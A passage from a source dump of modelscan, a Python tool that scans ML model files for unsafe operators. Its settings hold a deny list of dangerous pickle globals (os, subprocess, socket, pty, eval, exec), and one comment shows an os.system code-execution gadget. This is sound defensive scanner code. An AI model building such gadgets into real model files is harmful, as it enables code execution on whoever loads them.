SavedModelLambdaDetectScan.full_name() 109 | ]["unsafe_keras_operators"], 110 | ) 111 | 112 | else: 113 | return ScanResults( 114 | [], 115 | [], 116 | [], 117 | ) 118 | 119 | def _get_keras_operator_names(self, model: Model) -> List[str]: 120 | model_config_data = json.load(model.get_stream()) 121 | 122 | lambda_layers = [ 123 | layer.get("config", {}).get("function", {}) 124 | for layer in model_config_data.get("config", {}).get("layers", {}) 125 | if layer.get("class_name", {}) == "Lambda" 126 | ] 127 | if lambda_layers: 128 | return ["Lambda"] * len(lambda_layers) 129 | 130 | return [] 131 | 132 | @staticmethod 133 | def name() -> str: 134 | return "keras" 135 | 136 | @staticmethod 137 | def full_name() -> str: 138 | return "modelscan.scanners.KerasLambdaDetectScan" 139 | -------------------------------------------------------------------------------- /modelscan/scanners/pickle/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/modelscan/scanners/pickle/__init__.py -------------------------------------------------------------------------------- /modelscan/scanners/pickle/scan.py: -------------------------------------------------------------------------------- 1 | import logging 2 | from typing import Optional 3 | 4 | from modelscan.scanners.scan import ScanBase, ScanResults 5 | from modelscan.tools.utils import _is_zipfile 6 | from modelscan.tools.picklescanner import ( 7 | scan_numpy, 8 | scan_pickle_bytes, 9 | scan_pytorch, 10 | ) 11 | from modelscan.model import Model 12 | from modelscan.settings import SupportedModelFormats 13 | 14 | logger = logging.getLogger("modelscan") 15 | 16 | 17 | class PyTorchUnsafeOpScan(ScanBase): 18 | def scan( 19 | self, 20 | model: Model, 21 | ) -> Optional[ScanResults]: 22 | if SupportedModelFormats.PYTORCH.value not in [ 23 | format_property.value for format_property in model.get_context("formats") 24 | ]: 25 | return None 26 | 27 | if _is_zipfile(model.get_source(), model.get_stream()): 28 | return None 29 | 30 | results = scan_pytorch( 31 | model=model, 32 | settings=self._settings, 33 | ) 34 | 35 | return self.label_results(results) 36 | 37 | @staticmethod 38 | def name() -> str: 39 | return "pytorch" 40 | 41 | @staticmethod 42 | def full_name() -> str: 43 | return "modelscan.scanners.PyTorchUnsafeOpScan" 44 | 45 | 46 | class NumpyUnsafeOpScan(ScanBase): 47 | def scan( 48 | self, 49 | model: Model, 50 | ) -> Optional[ScanResults]: 51 | if SupportedModelFormats.NUMPY.value not in [ 52 | format_property.value for format_property in model.get_context("formats") 53 | ]: 54 | return None 55 | 56 | results = scan_numpy( 57 | model=model, 58 | settings=self._settings, 59 | ) 60 | 61 | return self.label_results(results) 62 | 63 | @staticmethod 64 | def name() -> str: 65 | return "numpy" 66 | 67 | @staticmethod 68 | def full_name() -> str: 69 | return "modelscan.scanners.NumpyUnsafeOpScan" 70 | 71 | 72 | class PickleUnsafeOpScan(ScanBase): 73 | def scan( 74 | self, 75 | model: Model, 76 | ) -> Optional[ScanResults]: 77 | if SupportedModelFormats.PICKLE.value not in [ 78 | format_property.value for format_property in model.get_context("formats") 79 | ]: 80 | return None 81 | 82 | results = scan_pickle_bytes( 83 | model=model, 84 | settings=self._settings, 85 | ) 86 | 87 | return self.label_results(results) 88 | 89 | @staticmethod 90 | def name() -> str: 91 | return "pickle" 92 | 93 | @staticmethod 94 | def full_name() -> str: 95 | return "modelscan.scanners.PickleUnsafeOpScan" 96 | -------------------------------------------------------------------------------- /modelscan/scanners/saved_model/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/modelscan/scanners/saved_model/__init__.py -------------------------------------------------------------------------------- /modelscan/scanners/saved_model/scan.py: -------------------------------------------------------------------------------- 1 | # scan pb files for both tensorflow and keras 2 | 3 | import json 4 | import logging 5 | 6 | from typing import List, Set, Optional, Dict, Any 7 | 8 | try: 9 | import tensorflow 10 | from tensorflow.core.protobuf.saved_model_pb2 import SavedModel 11 | from tensorflow.python.keras.protobuf.saved_metadata_pb2 import SavedMetadata 12 | 13 | tensorflow_installed = True 14 | except ImportError: 15 | tensorflow_installed = False 16 | 17 | 18 | from modelscan.error import ( 19 | DependencyError, 20 | JsonDecodeError, 21 | ) 22 | from modelscan.issues import Issue, IssueCode, IssueSeverity, OperatorIssueDetails 23 | from modelscan.scanners.scan import ScanBase, ScanResults 24 | from modelscan.model import Model 25 | from modelscan.settings import SupportedModelFormats 26 | 27 | logger = logging.getLogger("modelscan") 28 | 29 | 30 | class SavedModelScan(ScanBase): 31 | def scan( 32 | self, 33 | model: Model, 34 | ) -> Optional[ScanResults]: 35 | if SupportedModelFormats.TENSORFLOW.value not in [ 36 | format_property.value for format_property in model.get_context("formats") 37 | ]: 38 | return None 39 | 40 | dep_error = self.handle_binary_dependencies() 41 | if dep_error: 42 | return ScanResults( 43 | [], 44 | [ 45 | DependencyError( 46 | self.name(), 47 | f"To use {self.full_name()}, please install modelscan with tensorflow extras. `pip install 'modelscan[ tensorflow ]'` if you are using pip.", 48 | model, 49 | ) 50 | ], 51 | [], 52 | ) 53 | 54 | results = self._scan(model) 55 | 56 | return self.label_results(results) if results else None 57 | 58 | def _scan(self, model: Model) -> Optional[ScanResults]: 59 | raise NotImplementedError 60 | 61 | # This function checks for malicious operators in both Keras and Tensorflow 62 | @staticmethod 63 | def _check_for_unsafe_tf_keras_operator( 64 | module_name: str, 65 | raw_operator: List[str], 66 | model: Model, 67 | unsafe_operators: Dict[str, Any], 68 | ) -> ScanResults: 69 | issues: List[Issue] = [] 70 | all_operators = ( 71 | tensorflow.raw_ops.__dict__.keys() if tensorflow_installed else [] 72 | ) 73 | all_safe_operators = [ 74 | operator for operator in list(all_operators) if operator[0] != "_" 75 | ] 76 | 77 | for op in raw_operator: 78 | if op in unsafe_operators: 79 | severity = IssueSeverity[unsafe_operators[op]] 80 | elif op not in all_safe_operators: 81 | severity = IssueSeverity.MEDIUM 82 | else: 83 | continue 84 | 85 | issues.append( 86 | Issue( 87 | code=IssueCode.UNSAFE_OPERATOR, 88 | severity=severity, 89 | details=OperatorIssueDetails( 90 | module=module_name, 91 | operator=op, 92 | source=str(model.get_source()), 93 | severity=severity, 94 | ), 95 | ) 96 | ) 97 | return ScanResults(issues, [], []) 98 | 99 | def handle_binary_dependencies( 100 | self, settings: Optional[Dict[str, Any]] = None 101 | ) -> Optional[str]: 102 | if not tensorflow_installed: 103 | return DependencyError.name() 104 | return None 105 | 106 | @staticmethod 107 | def name() -> str: 108 | return "saved_model" 109 | 110 | @staticmethod 111 | def full_name() -> str: 112 | return "modelscan.scanners.SavedModelScan" 113 | 114 | 115 | class SavedModelLambdaDetectScan(SavedModelScan): 116 | def _scan(self, model: Model) -> Optional[ScanResults]: 117 | file_name = str(model.get_source()).split("/")[-1] 118 | if file_name != "keras_metadata.pb": 119 | return None 120 | 121 | machine_learning_library_name = "Keras" 122 | operators_in_model = self._get_keras_pb_operator_names(model) 123 | if operators_in_model: 124 | if "JSONDecodeError" in operators_in_model: 125 | return ScanResults( 126 | [], 127 | [ 128 | JsonDecodeError( 129 | self.name(), 130 | "Not a valid JSON data", 131 | model, 132 | ) 133 | ], 134 | [], 135 | ) 136 | 137 | return SavedModelScan._check_for_unsafe_tf_keras_operator( 138 | machine_learning_library_name, 139 | operators_in_model, 140 | model, 141 | self._settings["scanners"][self.full_name()]["unsafe_keras_operators"], 142 | ) 143 | 144 | @staticmethod 145 | def _get_keras_pb_operator_names(model: Model) -> List[str]: 146 | saved_metadata = SavedMetadata() 147 | saved_metadata.ParseFromString(model.get_stream().read()) 148 | 149 | try: 150 | lambda_layers = [ 151 | layer.get("config", {}).get("function", {}).get("items", {}) 152 | for layer in [ 153 | json.loads(node.metadata) 154 | for node in saved_metadata.nodes 155 | if node.identifier == "_tf_keras_layer" 156 | ] 157 | if layer.get("class_name", {}) == "Lambda" 158 | ] 159 | if lambda_layers: 160 | return ["Lambda"] * len(lambda_layers) 161 | 162 | except json.JSONDecodeError as e: 163 | logger.error( 164 | f"Not a valid JSON data from source: {str(model.get_source())}, error: {e}" 165 | ) 166 | return ["JSONDecodeError"] 167 | 168 | return [] 169 | 170 | @staticmethod 171 | def full_name() -> str: 172 | return "modelscan.scanners.SavedModelLambdaDetectScan" 173 | 174 | 175 | class SavedModelTensorflowOpScan(SavedModelScan): 176 | def _scan(self, model: Model) -> Optional[ScanResults]: 177 | file_name = str(model.get_source()).split("/")[-1] 178 | if file_name == "keras_metadata.pb": 179 | return None 180 | 181 | machine_learning_library_name = "Tensorflow" 182 | operators_in_model = self._get_tensorflow_operator_names(model) 183 | 184 | return SavedModelScan._check_for_unsafe_tf_keras_operator( 185 | machine_learning_library_name, 186 | operators_in_model, 187 | model, 188 | self._settings["scanners"][self.full_name()]["unsafe_tf_operators"], 189 | ) 190 | 191 | def _get_tensorflow_operator_names(self, model: Model) -> List[str]: 192 | saved_model = SavedModel() 193 | saved_model.ParseFromString(model.get_stream().read()) 194 | 195 | model_op_names: Set[str] = set() 196 | # Iterate over every metagraph in case there is more than one 197 | for meta_graph in saved_model.meta_graphs: 198 | # Add operations in the graph definition 199 | model_op_names.update(node.op for node in meta_graph.graph_def.node) 200 | # Go through the functions in the graph definition 201 | for func in meta_graph.graph_def.library.function: 202 | # Add operations in each function 203 | model_op_names.update(node.op for node in func.node_def) 204 | # Sort and convert to list 205 | return list(sorted(model_op_names)) 206 | 207 | @staticmethod 208 | def full_name() -> str: 209 | return "modelscan.scanners.SavedModelTensorflowOpScan" 210 | -------------------------------------------------------------------------------- /modelscan/scanners/scan.py: -------------------------------------------------------------------------------- 1 | import abc 2 | from typing import List, Optional, Any, Dict 3 | 4 | from modelscan.error import ErrorBase 5 | from modelscan.skip import ModelScanSkipped 6 | from modelscan.issues import Issue 7 | from modelscan.model import Model 8 | 9 | 10 | class ScanResults: 11 | issues: List[Issue] 12 | errors: List[ErrorBase] 13 | skipped: List[ModelScanSkipped] 14 | 15 | def __init__( 16 | self, 17 | issues: List[Issue], 18 | errors: List[ErrorBase], 19 | skipped: List[ModelScanSkipped], 20 | ) -> None: 21 | self.issues = issues 22 | self.errors = errors 23 | self.skipped = skipped 24 | 25 | 26 | class ScanBase(metaclass=abc.ABCMeta): 27 | def __init__( 28 | self, 29 | settings: Dict[str, Any], 30 | ) -> None: 31 | self._settings: Dict[str, Any] = settings 32 | 33 | @staticmethod 34 | @abc.abstractmethod 35 | def name() -> str: 36 | raise NotImplementedError 37 | 38 | @staticmethod 39 | @abc.abstractmethod 40 | def full_name() -> str: 41 | raise NotImplementedError 42 | 43 | @abc.abstractmethod 44 | def scan( 45 | self, 46 | model: Model, 47 | ) -> Optional[ScanResults]: 48 | raise NotImplementedError 49 | 50 | def handle_binary_dependencies( 51 | self, settings: Optional[Dict[str, Any]] = None 52 | ) -> Optional[str]: 53 | """ 54 | Implement this method if the plugin requires a binary dependency. 55 | It should perform the following actions: 56 | 57 | 1. Check if the dependency is installed 58 | 2. Return a ModelScanError prompting the install if not 59 | """ 60 | return None 61 | 62 | def label_results(self, results: ScanResults) -> ScanResults: 63 | for issue in results.issues: 64 | issue.details.scanner = self.full_name() 65 | return results 66 | -------------------------------------------------------------------------------- /modelscan/settings.py: -------------------------------------------------------------------------------- 1 | import tomlkit 2 | 3 | from typing import Any 4 | 5 | from modelscan._version import __version__ 6 | 7 | 8 | class Property: 9 | def __init__(self, name: str, value: Any) -> None: 10 | self.name = name 11 | self.value = value 12 | 13 | 14 | class SupportedModelFormats: 15 | TENSORFLOW = Property("TENSORFLOW", "tensorflow") 16 | KERAS_H5 = Property("KERAS_H5", "keras_h5") 17 | KERAS = Property("KERAS", "keras") 18 | NUMPY = Property("NUMPY", "numpy") 19 | PYTORCH = Property("PYTORCH", "pytorch") 20 | PICKLE = Property("PICKLE", "pickle") 21 | 22 | 23 | DEFAULT_REPORTING_MODULES = { 24 | "console": "modelscan.reports.ConsoleReport", 25 | "json": "modelscan.reports.JSONReport", 26 | } 27 | 28 | DEFAULT_SETTINGS = { 29 | "modelscan_version": __version__, 30 | "supported_zip_extensions": [".zip", ".npz"], 31 | "scanners": { 32 | "modelscan.scanners.H5LambdaDetectScan": { 33 | "enabled": True, 34 | "supported_extensions": [".h5"], 35 | }, 36 | "modelscan.scanners.KerasLambdaDetectScan": { 37 | "enabled": True, 38 | "supported_extensions": [".keras"], 39 | }, 40 | "modelscan.scanners.SavedModelLambdaDetectScan": { 41 | "enabled": True, 42 | "supported_extensions": [".pb"], 43 | "unsafe_keras_operators": { 44 | "Lambda": "MEDIUM", 45 | }, 46 | }, 47 | "modelscan.scanners.SavedModelTensorflowOpScan": { 48 | "enabled": True, 49 | "supported_extensions": [".pb"], 50 | "unsafe_tf_operators": { 51 | "ReadFile": "HIGH", 52 | "WriteFile": "HIGH", 53 | }, 54 | }, 55 | "modelscan.scanners.NumpyUnsafeOpScan": { 56 | "enabled": True, 57 | "supported_extensions": [".npy"], 58 | }, 59 | "modelscan.scanners.PickleUnsafeOpScan": { 60 | "enabled": True, 61 | "supported_extensions": [ 62 | ".pkl", 63 | ".pickle", 64 | ".joblib", 65 | ".dill", 66 | ".dat", 67 | ".data", 68 | ], 69 | }, 70 | "modelscan.scanners.PyTorchUnsafeOpScan": { 71 | "enabled": True, 72 | "supported_extensions": [".bin", ".pt", ".pth", ".ckpt"], 73 | }, 74 | }, 75 | "middlewares": { 76 | "modelscan.middlewares.FormatViaExtensionMiddleware": { 77 | "formats": { 78 | SupportedModelFormats.TENSORFLOW: [".pb"], 79 | SupportedModelFormats.KERAS_H5: [".h5"], 80 | SupportedModelFormats.KERAS: [".keras"], 81 | SupportedModelFormats.NUMPY: [".npy"], 82 | SupportedModelFormats.PYTORCH: [".bin", ".pt", ".pth", ".ckpt"], 83 | SupportedModelFormats.PICKLE: [ 84 | ".pkl", 85 | ".pickle", 86 | ".joblib", 87 | ".dill", 88 | ".dat", 89 | ".data", 90 | ], 91 | } 92 | } 93 | }, 94 | "unsafe_globals": { 95 | "CRITICAL": { 96 | "__builtin__": [ 97 | "eval", 98 | "compile", 99 | "getattr", 100 | "apply", 101 | "exec", 102 | "open", 103 | "breakpoint", 104 | "__import__", 105 | ], # Pickle versions 0, 1, 2 have those function under '__builtin__' 106 | "builtins": [ 107 | "eval", 108 | "compile", 109 | "getattr", 110 | "apply", 111 | "exec", 112 | "open", 113 | "breakpoint", 114 | "__import__", 115 | ], # Pickle versions 3, 4 have those function under 'builtins' 116 | "runpy": "*", 117 | "os": "*", 118 | "nt": "*", # Alias for 'os' on Windows. Includes os.system() 119 | "posix": "*", # Alias for 'os' on Linux. Includes os.system() 120 | "socket": "*", 121 | "subprocess": "*", 122 | "sys": "*", 123 | "operator": [ 124 | "attrgetter", # Ex of code execution: operator.attrgetter("system")(__import__("os"))("echo pwned") 125 | ], 126 | "pty": "*", 127 | "pickle": "*", 128 | "_pickle": "*", 129 | "bdb": "*", 130 | "pdb": "*", 131 | "shutil": "*", 132 | "asyncio": "*", 133 | }, 134 | "HIGH": { 135 | "webbrowser": "*", # Includes webbrowser.open() 136 | "httplib": "*", # Includes http.client.HTTPSConnection() 137 | "requests.api": "*", 138 | "aiohttp.client": "*", 139 | }, 140 | "MEDIUM": {}, 141 | "LOW": {}, 142 | }, 143 | "reporting": { 144 | "module": "modelscan.reports.ConsoleReport", 145 | "settings": {}, 146 | }, # JSON reporting can be configured by changing "module" to "modelscan.reports.JSONReport" and adding an optional "output_file" field. For custom reporting modules, change "module" to the module name and add the applicable settings fields 147 | } 148 | 149 | 150 | class SettingsUtils: 151 | @staticmethod 152 | def get_default_settings_as_toml() -> Any: 153 | toml_settings = tomlkit.dumps(DEFAULT_SETTINGS) 154 | 155 | # Add settings file header 156 | toml_settings = f"# ModelScan settings file\n\n{toml_settings}" 157 | 158 | return toml_settings 159 | -------------------------------------------------------------------------------- /modelscan/skip.py: -------------------------------------------------------------------------------- 1 | import logging 2 | 3 | from modelscan.settings import Property 4 | 5 | logger = logging.getLogger("modelscan") 6 | 7 | 8 | class SkipCategories: 9 | SCAN_NOT_SUPPORTED = Property("SCAN_NOT_SUPPORTED", 1) 10 | BAD_ZIP = Property("BAD_ZIP", 2) 11 | MODEL_CONFIG = Property("MODEL_CONFIG", 3) 12 | H5_DATA = Property("H5_DATA", 4) 13 | NOT_IMPLEMENTED = Property("NOT_IMPLEMENTED", 5) 14 | MAGIC_NUMBER = Property("MAGIC_NUMBER", 6) 15 | 16 | 17 | class Skip: 18 | scan_name: str 19 | category: SkipCategories 20 | message: str 21 | source: str 22 | 23 | def __init__(self) -> None: 24 | pass 25 | 26 | def __str__(self) -> str: 27 | raise NotImplementedError() 28 | 29 | 30 | class ModelScanSkipped: 31 | def __init__( 32 | self, 33 | scan_name: str, 34 | category: Property, 35 | message: str, 36 | source: str, 37 | ) -> None: 38 | self.scan_name = scan_name 39 | self.category = category 40 | self.message = message 41 | self.source = str(source) 42 | 43 | def __str__(self) -> str: 44 | return f"The following file {self.source} was skipped during a {self.scan_name} scan: \n{self.message}" 45 | -------------------------------------------------------------------------------- /modelscan/tools/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Matthieu Maitre 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | ========= 24 | BSD 3-Clause 25 | 26 | Copyright (c) 2015-2023, Heungsub Lee 27 | All rights reserved. 28 | 29 | Redistribution and use in source and binary forms, with or without modification, 30 | are permitted provided that the following conditions are met: 31 | 32 | Redistributions of source code must retain the above copyright notice, this 33 | list of conditions and the following disclaimer. 34 | 35 | Redistributions in binary form must reproduce the above copyright notice, this 36 | list of conditions and the following disclaimer in the documentation and/or 37 | other materials provided with the distribution. 38 | 39 | Neither the name of the copyright holder nor the names of its 40 | contributors may be used to endorse or promote products derived from 41 | this software without specific prior written permission. 42 | 43 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 44 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 45 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 46 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 47 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 48 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 49 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 50 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 51 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 52 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /modelscan/tools/cli_utils.py: -------------------------------------------------------------------------------- 1 | import click 2 | from click import Command, Context, HelpFormatter 3 | from typing import List, Optional, Tuple, Any, Union 4 | 5 | 6 | class DefaultGroup(click.Group): 7 | """Invokes a subcommand marked with `default=True` if any subcommand not 8 | chosen. 9 | 10 | :param default_if_no_args: resolves to the default command if no arguments 11 | passed. 12 | 13 | """ 14 | 15 | def __init__(self, *args: object, **kwargs) -> None: # type: ignore 16 | # To resolve as the default command. 17 | if not kwargs.get("ignore_unknown_options", True): 18 | raise ValueError("Default group accepts unknown options") 19 | self.ignore_unknown_options = True 20 | self.default_cmd_name = kwargs.pop("default", None) 21 | self.default_if_no_args = kwargs.pop("default_if_no_args", False) 22 | super(DefaultGroup, self).__init__(*args, **kwargs) # type: ignore 23 | 24 | def set_default_command(self, command: Command) -> None: 25 | """Sets a command function as the default command.""" 26 | cmd_name = command.name 27 | self.add_command(command) 28 | self.default_cmd_name = cmd_name 29 | 30 | def parse_args(self, ctx: Context, args: Any) -> List[str]: 31 | if not args and self.default_if_no_args: 32 | args.insert(0, self.default_cmd_name) 33 | return super(DefaultGroup, self).parse_args(ctx, args) 34 | 35 | def get_command(self, ctx: Context, cmd_name: str) -> Optional[Command]: 36 | if cmd_name not in self.commands: 37 | # No command name matched. 38 | ctx.arg0 = cmd_name # type: ignore 39 | cmd_name = self.default_cmd_name 40 | return super(DefaultGroup, self).get_command(ctx, cmd_name) 41 | 42 | def resolve_command( 43 | self, ctx: Context, args: Any 44 | ) -> Tuple[Optional[str], Optional[Command], List[str]]: 45 | base = super(DefaultGroup, self) 46 | cmd_name, cmd, args = base.resolve_command(ctx, args) # type: ignore 47 | if hasattr(ctx, "arg0"): 48 | args.insert(0, ctx.arg0) 49 | cmd_name = cmd.name 50 | return cmd_name, cmd, args 51 | 52 | def format_commands(self, ctx: Context, formatter: HelpFormatter) -> None: 53 | formatter = DefaultCommandFormatter(self, formatter, mark="*") 54 | return super(DefaultGroup, self).format_commands(ctx, formatter) 55 | 56 | def command(self, *args: Any, **kwargs: Any) -> Union[Any, Command]: 57 | default = kwargs.pop("default", False) 58 | decorator = super(DefaultGroup, self).command(*args, **kwargs) 59 | if not default: 60 | return decorator 61 | 62 | def _decorator(f: Command) -> Union[Any, Command]: 63 | cmd = decorator(f) 64 | self.set_default_command(cmd) 65 | return cmd 66 | 67 | return _decorator 68 | 69 | 70 | class DefaultCommandFormatter(HelpFormatter): 71 | """Wraps a formatter to mark a default command.""" 72 | 73 | def __init__(self, group: DefaultGroup, formatter: HelpFormatter, mark: str = "*"): 74 | self.group = group 75 | self.formatter = formatter 76 | self.mark = mark 77 | 78 | def __getattr__(self, attr): # type: ignore 79 | return getattr(self.formatter, attr) 80 | 81 | def write_dl(self, rows, *args, **kwargs): # type: ignore 82 | rows_ = [] # type: ignore 83 | for cmd_name, help in rows: 84 | if cmd_name == self.group.default_cmd_name: 85 | rows_.insert(0, (cmd_name + self.mark, help)) 86 | else: 87 | rows_.append((cmd_name, help)) 88 | return self.formatter.write_dl(rows_, *args, **kwargs) 89 | -------------------------------------------------------------------------------- /modelscan/tools/picklescanner.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import pickletools # nosec 3 | from tarfile import TarError 4 | from typing import IO, Any, Dict, List, Set, Tuple, Union, Optional 5 | 6 | import numpy as np 7 | 8 | from modelscan.error import PickleGenopsError 9 | from modelscan.skip import ModelScanSkipped, SkipCategories 10 | from modelscan.issues import Issue, IssueCode, IssueSeverity, OperatorIssueDetails 11 | from modelscan.scanners.scan import ScanResults 12 | from modelscan.model import Model 13 | 14 | logger = logging.getLogger("modelscan") 15 | 16 | from .utils import MAGIC_NUMBER, _should_read_directly, get_magic_number 17 | 18 | 19 | class GenOpsError(Exception): 20 | def __init__(self, msg: str, globals: Optional[Set[Tuple[str, str]]]): 21 | self.msg = msg 22 | self.globals = globals 23 | super().__init__() 24 | 25 | def __str__(self) -> str: 26 | return self.msg 27 | 28 | 29 | # TODO: handle methods loading other Pickle files (either mark as suspicious, or follow calls to scan other files [preventing infinite loops]) 30 | # 31 | # pickle.loads() 32 | # https://docs.python.org/3/library/pickle.html#pickle.loads 33 | # pickle.load() 34 | # https://docs.python.org/3/library/pickle.html#pickle.load 35 | # numpy.load() 36 | # https://numpy.org/doc/stable/reference/generated/numpy.load.html#numpy.load 37 | # numpy.ctypeslib.load_library() 38 | # https://numpy.org/doc/stable/reference/routines.ctypeslib.html#numpy.ctypeslib.load_library 39 | # pandas.read_pickle() 40 | # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_pickle.html 41 | # joblib.load() 42 | # https://joblib.readthedocs.io/en/latest/generated/joblib.load.html 43 | # torch.load() 44 | # https://pytorch.org/docs/stable/generated/torch.load.html 45 | # tf.keras.models.load_model() 46 | # https://www.tensorflow.org/api_docs/python/tf/keras/models/load_model 47 | # 48 | 49 | 50 | def _list_globals( 51 | data: IO[bytes], multiple_pickles: bool = True 52 | ) -> Set[Tuple[str, str]]: 53 | globals: Set[Any] = set() 54 | 55 | memo: Dict[Union[int, str], str] = {} 56 | # Scan the data for pickle buffers, stopping when parsing fails or stops making progress 57 | last_byte = b"dummy" 58 | while last_byte != b"": 59 | # List opcodes 60 | try: 61 | ops: List[Tuple[Any, Any, Union[int, None]]] = list( 62 | pickletools.genops(data) 63 | ) 64 | except Exception as e: 65 | # Given we can have multiple pickles in a file, we may have already successfully extracted globals from a valid pickle. 66 | # Thus return the already found globals in the error & let the caller decide what to do. 67 | globals_opt = globals if len(globals) > 0 else None 68 | raise GenOpsError(str(e), globals_opt) 69 | 70 | last_byte = data.read(1) 71 | data.seek(-1, 1) 72 | 73 | # Extract global imports 74 | for n in range(len(ops)): 75 | op = ops[n] 76 | op_name = op[0].name 77 | op_value: str = op[1] 78 | 79 | if op_name == "MEMOIZE" and n > 0: 80 | memo[len(memo)] = ops[n - 1][1] 81 | elif op_name in ["PUT", "BINPUT", "LONG_BINPUT"] and n > 0: 82 | memo[op_value] = ops[n - 1][1] 83 | elif op_name in ("GLOBAL", "INST"): 84 | globals.add(tuple(op_value.split(" ", 1))) 85 | elif op_name == "STACK_GLOBAL": 86 | values: List[str] = [] 87 | for offset in range(1, n): 88 | if ops[n - offset][0].name in [ 89 | "MEMOIZE", 90 | "PUT", 91 | "BINPUT", 92 | "LONG_BINPUT", 93 | ]: 94 | continue 95 | if ops[n - offset][0].name in ["GET", "BINGET", "LONG_BINGET"]: 96 | values.append(memo[int(ops[n - offset][1])]) 97 | elif ops[n - offset][0].name not in [ 98 | "SHORT_BINUNICODE", 99 | "UNICODE", 100 | "BINUNICODE", 101 | "BINUNICODE8", 102 | ]: 103 | logger.debug( 104 | "Presence of non-string opcode, categorizing as an unknown dangerous import" 105 | ) 106 | values.append("unknown") 107 | else: 108 | values.append(ops[n - offset][1]) 109 | if len(values) == 2: 110 | break 111 | if len(values) != 2: 112 | raise ValueError( 113 | f"Found {len(values)} values for STACK_GLOBAL at position {n} instead of 2." 114 | ) 115 | globals.add((values[1], values[0])) 116 | if not multiple_pickles: 117 | break 118 | 119 | return globals 120 | 121 | 122 | def scan_pickle_bytes( 123 | model: Model, 124 | settings: Dict[str, Any], 125 | scan_name: str = "pickle", 126 | multiple_pickles: bool = True, 127 | offset: int = 0, 128 | ) -> ScanResults: 129 | """Disassemble a Pickle stream and report issues""" 130 | issues: List[Issue] = [] 131 | try: 132 | raw_globals = _list_globals(model.get_stream(offset), multiple_pickles) 133 | except GenOpsError as e: 134 | if e.globals is not None: 135 | return _build_scan_result_from_raw_globals( 136 | e.globals, 137 | model, 138 | settings, 139 | ) 140 | return ScanResults( 141 | issues, 142 | [ 143 | PickleGenopsError( 144 | scan_name, 145 | f"Parsing error: {e}", 146 | model, 147 | ) 148 | ], 149 | [], 150 | ) 151 | logger.debug("Global imports in %s: %s", model, raw_globals, settings) 152 | return _build_scan_result_from_raw_globals(raw_globals, model, settings) 153 | 154 | 155 | def _build_scan_result_from_raw_globals( 156 | raw_globals: Set[Tuple[str, str]], 157 | model: Model, 158 | settings: Dict[str, Any], 159 | ) -> ScanResults: 160 | issues: List[Issue] = [] 161 | severities = { 162 | "CRITICAL": IssueSeverity.CRITICAL, 163 | "HIGH": IssueSeverity.HIGH, 164 | "MEDIUM": IssueSeverity.MEDIUM, 165 | "LOW": IssueSeverity.LOW, 166 | } 167 | 168 | for rg in raw_globals: 169 | global_module, global_name, severity = rg[0], rg[1], None 170 | for severity_name in severities: 171 | if global_module not in settings["unsafe_globals"][severity_name]: 172 | continue 173 | filter = settings["unsafe_globals"][severity_name][global_module] 174 | if filter == "*": 175 | severity = severities[severity_name] 176 | break 177 | for filter_value in filter: 178 | if filter_value in global_name: 179 | severity = severities[severity_name] 180 | break 181 | else: 182 | continue 183 | break 184 | if "unknown" in global_module or "unknown" in global_name: 185 | severity = IssueSeverity.CRITICAL # we must assume it is RCE 186 | if severity is not None: 187 | issues.append( 188 | Issue( 189 | code=IssueCode.UNSAFE_OPERATOR, 190 | severity=severity, 191 | details=OperatorIssueDetails( 192 | module=global_module, 193 | operator=global_name, 194 | source=model.get_source(), 195 | severity=severity, 196 | ), 197 | ) 198 | ) 199 | return ScanResults(issues, [], []) 200 | 201 | 202 | def scan_numpy(model: Model, settings: Dict[str, Any]) -> ScanResults: 203 | scan_name = "numpy" 204 | # Code to distinguish from NumPy binary files and pickles. 205 | _ZIP_PREFIX = b"PK\x03\x04" 206 | _ZIP_SUFFIX = b"PK\x05\x06" # empty zip files start with this 207 | N = len(np.lib.format.MAGIC_PREFIX) 208 | stream = model.get_stream() 209 | magic = stream.read(N) 210 | # If the file size is less than N, we need to make sure not 211 | # to seek past the beginning of the file 212 | stream.seek(-min(N, len(magic)), 1) # back-up 213 | if 